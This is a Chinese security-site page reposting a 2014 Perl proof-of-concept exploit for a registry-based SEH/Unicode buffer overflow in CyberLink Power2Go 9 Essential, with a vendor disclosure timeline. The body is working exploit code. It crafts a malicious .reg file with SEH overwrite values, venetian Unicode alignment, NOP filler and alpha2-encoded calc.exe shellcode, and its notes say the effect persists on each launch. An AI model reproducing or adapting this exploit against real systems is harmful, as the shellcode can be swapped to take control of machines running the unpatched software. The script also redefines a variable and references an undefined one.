首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow
来源:@SecuritySift 作者:Czumak 发布时间:2014-05-20  
#!/usr/bin/perl
  
######################################################################################################
# Exploit Title: CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow
# Discovery date: 11-26-2013
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software/Version: CyberLink Power2Go 9 Essential 9.0.1002.0
# Vendor Site: http://www.cyberlink.com/
# Tested On: Windows XP SP3
# Timeline:
# -- 11/28/13: Initial contact to vendor requesting appropriate POC to provide vuln details  
# -- 12/03/13: Received appropriate submission POC, initial vuln details provided to vendor
# -- 12/11/13: Vendor response indicating issue has been escalated to Development team
# -- 12/17/13: Vendor response indicating RD team working on fix
# -- 03/05/14: Requested status from vendor who indicated issue has been re-escalated to Development
# -- 03/07/13: Vendor response indicating someone from Development would contact for more details
# -- 03/07/14: Vendor response indicating product team working on fix, new release scheduled 3/28
# -- 03/16/14: Additional details provided to vendor as requested
# -- 04/06/14: Status update requested from vendor
# -- 04/08/14: New build released, provided for testing; confirmed fix for this issue
# Details:
# -- Power2Go uses registry keys to set various attributes including the registered username
# -- The registered username is loaded into memory for display when the "About" screen is opened
# -- These registry values can be found here: HKEY_LOCAL_MACHINE\SOFTWARE\CyberLink\Power2Go9\9.0
# -- It loads these values into memory without proper bounds checks which enables the exploit
# To Exploit:
# -- 1) Run created .reg file 2) Open Power2Go 3) Click on Power2Go Logo in the upper left corner 
# -- Once the registry has been modified, this exploit will be persistent and execute every time
# -- the application is run and the "About" screen is opened 
######################################################################################################
  
my $buffsize = 50000; # sets buffer size for consistent sized payload
  
# construct the required start and end of the reg file
my $regfilestart ="Windows Registry Editor Version 5.00\n\n";
$regfilestart = $regfilestart . "[HKEY_LOCAL_MACHINE\\SOFTWARE\\CyberLink\\Power2Go9\\9.0]\n";
$regfilestart = $regfilestart . "\"UserName\"="; # The UserName field is vulnerable
  
my $junk = "T_v3rn1x" . ("\x41" x 4892); # offset to next seh 
my $nseh = "\x61\x62"; # overwrite next seh with popad + nop
my $seh = "\xd0\x50"; # overwrite seh with unicode friendly pop pop ret
  
# unicode venetian alignment
my $venalign = "\x6e";
$venalign = $venalign . "\x53"; # push ebx; ebx is the register closest to our shellcode following the popad 
$venalign = $venalign . "\x6e"; # venetian pad/align
$venalign = $venalign . "\x58"; # pop eax; put ebx into eax and modify to jump to our shellcode (200 bytes)
$venalign = $venalign . "\x6e"; # venetian pad/align
$venalign = $venalign . "\x05\x14\x11"; # add eax,0x11001400
$venalign = $venalign . "\x6e"; # venetian pad/align 
$venalign = $venalign . "\x2d\x12\x11"; # sub eax,0x11001200
$venalign = $venalign . "\x6e"; # venetian pad/align
$venalign = $venalign . "\x50"; # push eax
$venalign = $venalign . "\x6e"; # venetian pad/align
$venalign = $venalign . "\xc3"; # ret
  
my $nops = "\x71" x 236; # some unicode friendly filler before the shellcode
  
# Calc.exe payload
# msfpayload windows/exec CMD=calc.exe R
# alpha2 unicode/uppercase
my $shell = "PPYAIAIAIAIAQATAXAZAPA3QADAZA".
"BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA".
"58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB".
"AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K".
"22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL".
"MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55".
"Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V".
"NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB".
"R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT".
"NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU".
"89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM".
"KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC".
"QQ2LRCM0LJA";
  
my $sploit = $junk.$nseh.$seh.$venalign.$nops.$shell; # assemble the exploit portion of the buffer
my $fill = "\x71" x ($buffsize - length($sploit)); # fill remainder of buffer with junk
my $buffer = $sploit.$fill; # assemble the final buffer
  
my $regfile = $regfilestart . "hex: " . $buffer . $regfileend; # construct the reg file with hex payload to generate binary registry entry
my $regfile = $regfilestart . "\"". $buffer . "\"";
  
# write the exploit buffer to file
my $file = "cyberlinkp2g9_bof.reg";
open(FILE, ">$file");
print FILE $regfile;
close(FILE);
print "Exploit file [" . $file . "] created\n";
print "Buffer size: " . length($buffer) . "\n";
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·AoA DVD Creator 2.6.2 - Active
·HP Release Control Authenticat
·AoA Audio Extractor Basic 2.3.
·SafeNet Sentinel Protection Se
·AoA MP4 Converter 4.1.2 - Acti
·UPS Web/SNMP-Manager CS121 Log
·Intel Ideo Video 4.5 Memory Co
·Symantec Workspace Streaming A
·Allplayer 5.9 Memory Corruptio
·SPIP - CMS < 3.0.9 / 2.1.22 /
·Realplayer 16.0.3.51 Memory Co
·Easy File Management Web Serve
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved